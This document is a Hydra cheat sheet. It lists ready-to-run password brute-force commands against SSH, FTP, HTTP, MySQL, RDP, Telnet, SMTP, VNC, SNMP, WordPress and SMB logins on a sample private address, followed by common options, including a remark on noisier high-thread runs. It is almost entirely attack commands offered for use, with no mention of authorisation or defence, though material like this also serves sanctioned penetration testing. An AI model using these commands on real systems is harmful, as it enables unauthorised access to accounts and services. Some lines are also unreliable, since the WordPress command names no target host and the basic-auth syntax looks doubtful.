Hydra Brute forcing

---

Brute Forcing SSH

hydra -l root -P passwords.txt ssh://192.168.1.100

• -l root: Specifies the username.
• -P passwords.txt: Uses a password list for brute force.
• ssh://192.168.1.100: Target IP and protocol.

Alternative: Using multiple usernames

hydra -L users.txt -P passwords.txt ssh://192.168.1.100

Brute Forcing FTP

hydra -l admin -P passwords.txt ftp://192.168.1.100

• Targets FTP on 192.168.1.100 with a password list.

Alternative: Anonymous Login

hydra -l anonymous -P passwords.txt ftp://192.168.1.100

• Tests if anonymous FTP login is enabled.

Brute Forcing HTTP Login (Basic Auth)

hydra -L users.txt -P passwords.txt http://192.168.1.100 -m /admin

• -m /admin: Specifies the login page.

Brute Forcing MySQL

hydra -L users.txt -P passwords.txt 192.168.1.100 mysql

• Attacks MySQL with a username and password list.

Brute Forcing RDP

hydra -L users.txt -P passwords.txt rdp://192.168.1.100

• Tests Remote Desktop Protocol (RDP).

Brute Forcing Telnet

hydra -l admin -P passwords.txt telnet://192.168.1.100

• Brute forces Telnet login.

Brute Forcing SMTP (Mail Server)

hydra -L users.txt -P passwords.txt smtp://192.168.1.100 -V

• -V: Verbose mode to see each attempt.

Brute Forcing VNC

hydra -P passwords.txt vnc://192.168.1.100

• Targets VNC login with a password list.

Brute Forcing SNMP

hydra -P community.txt snmp://192.168.1.100

• Tests for weak SNMP community strings.

Brute Forcing WordPress

hydra -L users.txt -P passwords.txt http-post-form \
"wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"

• Targets WordPress login forms.

Brute Forcing SMB (Windows File Sharing)

hydra -L users.txt -P passwords.txt smb://192.168.1.100

• Tests weak credentials on SMB.

Common Options

• -l <username>: Single username.
• -L <file>: List of usernames.
• -P <file>: List of passwords.
• -t <number>: Threads 1 -64 More means faster but louder
• -V: Verbose mode (shows each attempt).
• -f: Stops when a valid login is found.